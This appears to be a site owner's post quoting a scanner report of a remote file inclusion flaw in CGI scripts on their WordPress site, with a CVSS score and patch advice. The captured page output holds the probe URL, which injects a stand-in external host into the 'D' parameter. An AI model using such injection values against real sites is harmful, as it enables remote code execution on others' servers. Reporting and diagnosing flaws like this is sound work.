My host states the WPS is injectable at the D parameter and the remote CGI is able to run scripts because there is not proper sanitizing using the HTTP method.
The remote web server hosts cgi scripts that fail to adequately sanitize request strings. By
leveraging this issue, an attacker may be able to include a remote file from a remote server and
execute arbitrary commands on the target host.
High / CVSS Base Score : 7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
output
[…] includes%3A+safety%2C+saving+money%2C+eco-friendly%2C+speed%2C+and+more+convenience…Will+you+choose+to+MAD%3F+It+is+time+to+Make+A+Difference.%0D%0A%0D%0A%0D%0AStatistics%0D%0ADo+you+want+to+become+a+statistic%3F+Read+and+decide+if+you+are+already+a+stat%20-%20http://mommasmoneymatters.com/mad-bill-pay/?D=http://w2DCfiZo.example.com/” title=”Email this” target=”_blank” rel=”nofollow”class=”wp-socializer-single”>